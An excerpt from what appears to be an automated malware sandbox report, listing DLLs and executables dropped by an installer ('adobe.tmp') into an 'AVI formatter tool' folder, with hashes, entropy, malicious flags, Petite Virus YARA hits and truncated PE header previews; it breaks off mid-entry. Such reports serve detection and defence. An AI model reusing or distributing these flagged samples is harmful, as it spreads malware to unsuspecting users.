                                                                                                                                                        SHA1:93971C6BB25F3F4D54D4DF6C0C002199A2F84525
                                                                                                                                                        SHA-256:43A9928D6604BF604E43C2E1BAB30AE1654B3C26E66475F9488A95D89A4E6113
                                                                                                                                                        SHA-512:D0834F7DB31ABA8AA9D97479938DA2D4CD945F76DC2203D60D24C75D29D36E635C2B0D97425027C4DEBA558B8A41A77E288F73263FA9ABC12C54E93510E3D384
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......KL...-d..-d..-d..U...-d..Be..-d.TEe..-d..-e.:-d..Ba..-d..B`..-d..Bg..-d..B`.c-d..Bd..-d..B...-d..Bf..-d.Rich.-d.........................PE..L.....b`...........!.....L..........+S.......`...............................P............@.................................L........... .................... ..\ ..$...............................@...@............`...............................text...NK.......L.................. ..`.rdata......`.......P..............@..@.data...............................@....rsrc... ...........................@..@.reloc..\ ... ..."..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-JAAP8.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):240654
                                                                                                                                                        Entropy (8bit):6.518503846592995
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:yZDfF4DjzIHBV+bUeenu+t+oSTdjpNZ7utS81qpHW4paP2L:ekjzMBVKXeuq+oSTdjpr7N8f+L
                                                                                                                                                        MD5:4F0C85351AEC4B00300451424DB4B5A4
                                                                                                                                                        SHA1:BB66D807EDE0D7D86438207EB850F50126924C9D
                                                                                                                                                        SHA-256:CC0B53969670C7275A855557EA16182C932160BC0F8543EFFC570F760AE2185E
                                                                                                                                                        SHA-512:80C84403ED47380FF75EBA50A23E565F7E5C68C7BE8C208A5A48B7FB0798FF51F3D33780C902A6F8AB0E6DB328860C071C77B93AC88CADF84FEF7DF34DE3E2DA
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....H...................`.....g.................................\........ .........................o.......\...............................t............................S.......................................................text...dF.......H..................`.P`.data...X....`.......L..............@.P..rdata.......p.......N..............@.`@/4.......<.......>...T..............@.0@.bss..................................`..edata..o...........................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls................................@.0..reloc..t...........................@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-JAMVB.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):31936
                                                                                                                                                        Entropy (8bit):6.6461204214578
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:SEEn30ilOAb++HynTDbc3fwaVCPxWE/MM:SEa0YOU1HgU3fwaVCPxqM
                                                                                                                                                        MD5:72E3BDD0CE0AF6A3A3C82F3AE6426814
                                                                                                                                                        SHA1:A2FB64D5B9F5F3181D1A622D918262CE2F9A7AA3
                                                                                                                                                        SHA-256:7AC8A8D5679C96D14C15E6DBC6C72C260AAEFB002D0A4B5D28B3A5C2B15DF0AB
                                                                                                                                                        SHA-512:A876D0872BFBF099101F7F042AEAF1FD44208A354E64FC18BAB496BEEC6FDABCA432A852795CFC0A220013F619F13281B93ECC46160763AC7018AD97E8CC7971
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........P.........#.....&...L...............@.....d................................8......... .........................b............................P...,...................................R......................x................................text....%.......&..................`.P`.data........@.......*..............@.`..rdata.......P.......,..............@.0@/4...........`.......2..............@.0@.bss.........p........................`..edata..b............>..............@.0@.idata...............@..............@.0..CRT....,............H..............@.0..tls.................J..............@.0..reloc...............L..............@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-L5R6H.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):197646
                                                                                                                                                        Entropy (8bit):6.1570532273946625
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:brPGp0y4SP+iBGgySYm+dE3sYrJqkAzhU88vsAGSW+:brPGaTEsHSYmbbOU8osAGG
                                                                                                                                                        MD5:2C8EC61630F8AA6AAC674E4C63F4C973
                                                                                                                                                        SHA1:64E3BB9AA505C66E87FE912D4EA3054ADF6CEF76
                                                                                                                                                        SHA-256:DFD55D0DDD1A7D081FCE8E552DC29706A84DC6CA2FDD2F82D63F33D74E882849
                                                                                                                                                        SHA-512:488378012FB5F477ED4636C37D7A883B1DAD0FBC671D238B577A9374EFE40AB781F5E483AE921F1909A9B7C1C2A3E78E29B533D3B6FFE15AAEE840CAD2DCF5D0
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................m................................]_........ ...................... ..A....0...............................`..............................p0.......................1..D............................text...............................`.P`.data...............................@.0..rdata..L0.......2..................@.`@/4...........P......................@.0@.bss..................................`..edata..A.... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-LAMVM.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):337408
                                                                                                                                                        Entropy (8bit):6.515131904432587
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:3nzsyDn7PDS+FDflUjvJUkbEOyF1rOpsuCOuOff5k4F/lTRHA:3377SKfgvqkbFyFJCRRzH
                                                                                                                                                        MD5:62D2156E3CA8387964F7AA13DD1CCD5B
                                                                                                                                                        SHA1:A5067E046ED9EA5512C94D1D17C394D6CF89CCCA
                                                                                                                                                        SHA-256:59CBFBA941D3AC0238219DAA11C93969489B40F1E8B38FABDB5805AC3DD72BFA
                                                                                                                                                        SHA-512:006F7C46021F339B6CBF9F0B80CFFA74ABB8D48E12986266D069738C4E6BDB799BFBA4B8EE4565A01E90DBE679A96A2399D795A6EAD6EACBB4818A155858BF60
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..|...|...|...p...|...w...|.d.r...|...v...|...x...|.i.#...|...}.|.|.d.!...|...w...|..V....|...v...|.......|. .z...|.Rich..|.........PE..L....r.b.....................>......\........ ....@.......................................@.....................................x....0.......................@...3................................................... ..(............................text............................... ..`.rdata..r.... ......................@..@.data....'..........................@....sxdata...... ......................@....rsrc........0......................@..@.reloc...<...@...>..................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-M7I8F.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):197120
                                                                                                                                                        Entropy (8bit):6.423554884287906
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:X+dMKihenEUunaA+mVMISPCG5vHglwiaJVZkRyAHeOdrQpCklkHy+axeY0R2JdXs:MagxOOZWP2dC28d+y2e
                                                                                                                                                        MD5:67247C0ACA089BDE943F802BFBA8752C
                                                                                                                                                        SHA1:508DA6E0CF31A245D27772C70FFA9A2AE54930A3
                                                                                                                                                        SHA-256:BAB8D388EA3AF1AABB61B8884CFAA7276A2BFD77789856DD610480C55E4D0A60
                                                                                                                                                        SHA-512:C4A690A53581D3E4304188FD772C6F1DA1C72ED2237A13951ACE8879D1986423813A6F7534FF506790CB81633CEB7FF6A6239C1F852725FBACA4B40D9AE3F2DB
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d,.. M.. M.. M..4&..-M..4&...M..4&..3M..r8...M..r8../M..r8..1M..4&..#M.. M.._M..v8..$M..v8..!M..v8..!M..v8..!M..Rich M..........PE..L... ..a...........!.........................................................@............@.........................@...p.......(............................ ..(...P...8...............................@...............H............................text...>........................... ..`.rdata..d...........................@..@.data...H...........................@....rsrc...............................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-N9KV6.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):17472
                                                                                                                                                        Entropy (8bit):7.524548435291935
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:IwwsQD13cT5HhSVeEQNW5kbbcGEh/qTio+lyTnGy:QRD13ySVeEOW5kbSSTHNTnr
                                                                                                                                                        MD5:7B52BE6D702AA590DB57A0E135F81C45
                                                                                                                                                        SHA1:518FB84C77E547DD73C335D2090A35537111F837
                                                                                                                                                        SHA-256:9B5A8B323D2D1209A5696EAF521669886F028CE1ECDBB49D1610C09A22746330
                                                                                                                                                        SHA-512:79C1959A689BDC29B63CA771F7E1AB6FF960552CADF0644A7C25C31775FE3458884821A0130B1BAB425C3B41F1C680D4776DD5311CE3939775A39143C873A6FE
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MZ......................@...................................D.... ..PE..L....^.L...........!....%v..%.......6........`......................................................................h..................@....................F...............................................................................................p.......8..................`....rsrc...........@....B..............@..@....................................@...........%...........................`.......................................X...x..0....j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.,..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..D..%...........|...CC.......p......n....<.......`..............lH......)...............

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-NLBLP.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):214016
                                                                                                                                                        Entropy (8bit):6.676457645865373
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:v3UEEkp2yVTcc295GSSazZq0/OlxAOxN5jZ2Ti30ezAg0Fu9RBhk1Xion:cEEpYcc2G/adqLtxLZ2+vAO9Hhkzn
                                                                                                                                                        MD5:2C747F19BF1295EBBDAB9FB14BB19EE2
                                                                                                                                                        SHA1:6F3B71826C51C739D6BB75085E634B2B2EF538BC
                                                                                                                                                        SHA-256:D2074B91A63219CFD3313C850B2833CD579CC869EF751B1F5AD7EDFB77BD1EDD
                                                                                                                                                        SHA-512:C100C0A5AF52D951F3905884E9B9D0EC1A0D0AEBE70550A646BA6E5D33583247F67CA19E1D045170A286D92EE84E1676A6C1B0527E017A35B6242DD9DEE05AF4
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}6,.9WB.9WB.9WB...9.:WB.9WC.hWB....;WB."..&WB."..WB."...WB.9WB.?WB."..8WB."..8WB."..8WB.Rich9WB.........PE..L......W...........!.....N...........n.......`............................................@.........................`...h.......(....`..X....................p.......................................................`...............................text...?L.......N.................. ..`.rdata......`.......R..............@..@.data....W.......2..................@....rsrc...X....`......................@..@.reloc..f&...p...(..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-O3BDJ.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):26126
                                                                                                                                                        Entropy (8bit):6.048294343792499
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:hhkxE9v7/GRm4v5OxlBWaEybb9p7aCyS/hU7CateHcUwSCnq6D:Yx6jGXvc5WaBb99yS/hQh
                                                                                                                                                        MD5:D1223F86EDF0D5A2D32F1E2AAAF8AE3F
                                                                                                                                                        SHA1:C286CA29826A138F3E01A3D654B2F15E21DBE445
                                                                                                                                                        SHA-256:E0E11A058C4B0ADD3892E0BEA204F6F60A47AFC86A21076036393607235B469C
                                                                                                                                                        SHA-512:7EA1FFB23F8A850F5D3893C6BB66BF95FAB2F10F236A781620E9DC6026F175AAE824FD0E03082F0CF13D05D13A8EEDE4F5067491945FCA82BBCDCF68A0109CFF
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........f.........#.....6...b...............P.....h................................8-........ .........................i...................................................................Lk......................................................text....4.......6..................`.P`.data...,....P.......:..............@.0..rdata.......`.......<..............@.`@/4......T....p.......J..............@.0@.bss..................................`..edata..i............V..............@.0@.idata...............X..............@.0..CRT....,............^..............@.0..tls.................`..............@.0..reloc...............b..............@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-OJAID.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):68042
                                                                                                                                                        Entropy (8bit):6.090396152400884
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:RX3HAdi7wgCsL6dVSngk2IFm3ZJVRDBLRROBBKRzPm3YRiF+ixh:NHQpe6SnZQLjICPm3Ytib
                                                                                                                                                        MD5:5DDA5D34AC6AA5691031FD4241538C82
                                                                                                                                                        SHA1:22788C2EBE5D50FF36345EA0CB16035FABAB8A6C
                                                                                                                                                        SHA-256:DE1A9DD251E29718176F675455592BC1904086B9235A89E6263A3085DDDCBB63
                                                                                                                                                        SHA-512:08385DE11A0943A6F05AC3F8F1E309E1799D28EA50BF1CA6CEB01E128C0CD7518A64E55E8B56A4B8EF9DB3ECD2DE33D39779DCA1FBF21DE735E489A09159A1FD
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...&...........................d......................................@... ..............................0..t....`..P....................p.......................................................1..H............................text...d...........................`..`.data...L...........................@....rdata..\...........................@..@/4.......2.......4..................@..@.bss.....................................edata..............................@..@.idata..t....0......................@....CRT....0....@......................@....tls.........P......................@....rsrc...P....`......................@....reloc.......p......................@..B........................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-P1JK8.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):22542
                                                                                                                                                        Entropy (8bit):5.5875455203930615
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:RKAPwPQJgZd3rw0bGMtyz1fiaqmjj1nFY4j70UotV9mRyK:YPQJgZZwUGH1fJljj1+D18
                                                                                                                                                        MD5:E1C0147422B8C4DB4FC4C1AD6DD1B6EE
                                                                                                                                                        SHA1:4D10C5AD96756CBC530F3C35ADCD9E4B3F467CFA
                                                                                                                                                        SHA-256:124F210C04C12D8C6E4224E257D934838567D587E5ABAEA967CBD5F088677049
                                                                                                                                                        SHA-512:A163122DFFE729E6F1CA6EB756A776F6F01A784A488E2ACCE63AEAFA14668E8B1148BE948EB4AF4CA8C5980E85E681960B8A43C94B95DFFC72FCCEE1E170BD9A
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........X...............,...T...............@....@.......................................... .................................@...........................................................PU..........................P............................text....+.......,..................`.P`.data........@.......0..............@.`..rdata..0....P.......2..............@.0@/4...........`.......<..............@.0@.bss.........p........................`..idata..@............J..............@.0..CRT....4............T..............@.0..tls.................V..............@.0.................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-QIBJG.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):19008
                                                                                                                                                        Entropy (8bit):7.672481244971812
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:dz7otnjFa4ECX3yeGjA+tSXGnUav92hca+XWRlsuG+is:po7GU+szS3W7sQ7
                                                                                                                                                        MD5:8EE91149989D50DFCF9DAD00DF87C9B0
                                                                                                                                                        SHA1:E5581E6C1334A78E493539F8EA1CE585C9FFAF89
                                                                                                                                                        SHA-256:3030E22F4A854E11A8AA2128991E4867CA1DF33BC7B9AFF76A5E6DEEF56927F6
                                                                                                                                                        SHA-512:FA04E8524DA444DD91E4BD682CC9ADEE445259E0C6190A7DEF82B8C4478A78AAA8049337079AD01F7984DBA28316D72445A0F0D876F268A062AD9B8FF2A6E58D
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...................................D.... ..PE..L....+vS...........!....6...6.......6........p......................................................................0..........P.......@...................tM.......................................................................................................>..................`....rsrc...........@....H..............@..@....................................@...........6...........................`.......................................D...n'......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.5..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X............f.......Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..K..........(...|...}K...................E..K....p..j...g........Q..........y...........

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-R0SOB.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):967168
                                                                                                                                                        Entropy (8bit):6.500850562754145
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
                                                                                                                                                        MD5:C06D6F4DABD9E8BBDECFC5D61B43A8A9
                                                                                                                                                        SHA1:16D9F4F035835AFE8F694AE5529F95E4C3C78526
                                                                                                                                                        SHA-256:665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
                                                                                                                                                        SHA-512:B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.~..m...m...m......m.....m......m.......m..)3...m..)3...m..)3...m.......m...m..rm...m..m..3...m..3...m..3...m..Rich.m..........................PE..L...8..^...........!.........&.......`....................................................@..........................4.......G..<...............................HR..P+..T............................+..@...............D............................text............................... ..`.rdata..............................@..@.data........P...$...D..............@....trace.......`.......h..............@..@.gfids...............~..............@..@_RDATA..@...........................@..@.debug_o............................@..B.rsrc................l..............@..@.reloc..HR.......T...n..............@..B................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-RTU9Q.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):36752
                                                                                                                                                        Entropy (8bit):7.780431937344781
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:E7epCl6I8YbTvEKXQ2vm+iocmmMt7KjuDnlVahRlmftuY5B:EepUv8aZvmd+7nDDalauy
                                                                                                                                                        MD5:9FF783BB73F8868FA6599CDE65ED21D7
                                                                                                                                                        SHA1:F515F91D62D36DC64ADAA06FA0EF6CF769376BDF
                                                                                                                                                        SHA-256:E0234AF5F71592C472439536E710BA8105D62DFA68722965DF87FED50BAB1816
                                                                                                                                                        SHA-512:C9D3C3502601026B6D55A91C583E0BB607BFC695409B984C0561D0CBE7D4F8BD231BC614E0EC1621C287BF0F207017D3E041694320E692FF00BC2220BFA26C26
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.........n.......................................................B....@.........................P...........d.......@............s.......x..........................................................8............................................j..................@..@.rsrc.... ...........l..............@..@petite...............p..............`..`..................8..u...I.x|}...g{...@..ffe.c4.-.Bj..........U.J.`..s.N:`..I@;..B.kbmj..E%2. `....".]&.&.).BB...E..4u'.....Q.......%....V.............5...y....E..q<w.....j...B..O...p....*.X...m...= .X..........4........~~.8.F@.V...6....;?.5..)S.m.9U......^.zO!1o.F.E. ...H=`2...9.(...4).E.!G..;R.1.#.h0..(*..t8..O...Td.d..~...l.a..U...b<../..W....M6...U*G..II.x........>..I[...v.N/.V..3..Y.c...Zh.i..i.....n....M..D....5o."....(.9.+..z...._$t.T...X#\...N....Q%...>U..|....J

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-SD2K4.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):35588
                                                                                                                                                        Entropy (8bit):7.817557274117395
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:dCrMZHv56WRldhmLjQDrbfc8cznHvc6modHQ:sAR0LzHvc6m2HQ
                                                                                                                                                        MD5:58521D1AC2C588B85642354F6C0C7812
                                                                                                                                                        SHA1:5912D2507F78C18D5DC567B2FA8D5AE305345972
                                                                                                                                                        SHA-256:452EEE1E4EF2FE2E00060113CCE206E90986E2807BB966019AC4E9DEB303A9BD
                                                                                                                                                        SHA-512:3988B61F6B633718DE36C0669101E438E70A17E3962A5C3A519BDECC3942201BA9C3B3F94515898BB2F8354338BA202A801B22129FC6D56598103B13364748C1
                                                                                                                                                        Malicious:false
                                                                                                                                                        Yara Hits:
                                                                                                                                                        • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-SD2K4.tmp, Author: Joe Security
                                                                                                                                                        Preview:MZ......................@...................................D.... ..PE..L.....yX...........!.................@.......................................P............@.........................PB.......A..d.... ..@...................P........................................................A..8...............................................................@..@.rsrc........ ......................@..@.............0.........................@petite.......@......................`..`...................................._3.....g.ge..7t...R-_.R.@c.S.\..J?L.EZ.,....=H8..;.QJ.....P-)eFs93:.^...f......}..?...e...SD.......-.u.......q2...P...6..z5.T.S..P..Q....@..Mq.>....8" F...,..FE...S.[U..c......jr....b...-%...`......w..+W.C......]..#......LS....W.Y....o.8...i.[)..%(.2.t...YY .bL.....b.@&J,?l.........$..F..&...a#.\[".^...&]co....K.>...xQzw..XW.uT..+dm.o.b...@c....3..r....@]...P........{C/.....A!.&..........'....._..."S..&..F.......:.dxtK.6...7.I...Q..Nm2.....NX..fG..L..7.?..".(

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-TA1T4.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):7910
                                                                                                                                                        Entropy (8bit):6.931925007191986
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:piDl1jKrGer007ia6abHX0d/aeHeN+VPHIJQxNiJCl9AK0f:IDJ9aDb30dCe+4PHIJrJCl9AK0f
                                                                                                                                                        MD5:1268DEA570A7511FDC8E70C1149F6743
                                                                                                                                                        SHA1:1D646FC69145EC6A4C0C9CAD80626AD40F22E8CD
                                                                                                                                                        SHA-256:F266DBA7B23321BF963C8D8B1257A50E1467FAAAB9952EF7FFED1B6844616649
                                                                                                                                                        SHA-512:E19F0EA39FF7AA11830AF5AAD53343288C742BE22299C815C84D24251FA2643B1E0401AF04E5F9B25CAB29601EA56783522DDB06C4195C6A609804880BAE9E9B
                                                                                                                                                        Malicious:false
                                                                                                                                                        Yara Hits:
                                                                                                                                                        • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-TA1T4.tmp, Author: Joe Security
                                                                                                                                                        Preview:MZ......................@...................................D.... ..PE..L.....V...........!.................p.......0............................................@.........................Pr.......q..d....P.......................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`.........................................|7{M..... ........r B`.Zr..P.........T}.e..YJ...=.X..q.}......b.I...G.....^.d...R..-R.....d_.......K.q.H.A=.-S..,_.....L...........2.............u.u.%...:.q....c.[.....`...\.X..8..B.@L..3.7.q.....)!.- ...D.....p...J...RU..Q.A..[.#&..R.....".+4...px/7..\....4...., ..8...5.hV.>] ....3.-.<..I+.<r..T..H,Q..!..i--..+.Zq.[...H... ...N.8..#...a.x.iU.G..-_..R....Z(cT%.....S.P.U:g?...;....&....@..KI.X.Q..PQ..v..*....{..~..}..f....c..`....Q...q..%......,j.4.Y..)....Cf7..

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-TS18M.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):16910
                                                                                                                                                        Entropy (8bit):5.289608933932413
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:ohtyjknGC7hipL+9mLYFOozxkdlDNUwS5Qq:UGknGC74l+MUFI7C
                                                                                                                                                        MD5:2F040608E68E679DD42B7D8D3FCA563E
                                                                                                                                                        SHA1:4B2C3A6B8902E32CDA33A241B24A79BE380C55FC
                                                                                                                                                        SHA-256:6B980CADC3E7047CC51AD1234CB7E76FF520149A746CB64E5631AF1EA1939962
                                                                                                                                                        SHA-512:718AF5BE259973732179ABA45B672637FCA21AE575B4115A62139A751C04F267F355B8F7F7432B56719D91390DABA774B39283CBCFE18F09CA033389FB31A4FC
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........B.........#.........>...f...........0.....h......................... ................ .........................{.......|...............................$...........................pA.......................................................text...4...........................`.P`.data...<....0......."..............@.0..rdata.......@.......$..............@.`@/4...........P.......(..............@.0@.bss.....d...`........................`..edata..{............2..............@.0@.idata..|............4..............@.0..CRT....,............:..............@.0..tls.................<..............@.0..reloc..$............>..............@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-USOE1.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):36416
                                                                                                                                                        Entropy (8bit):7.842278356440954
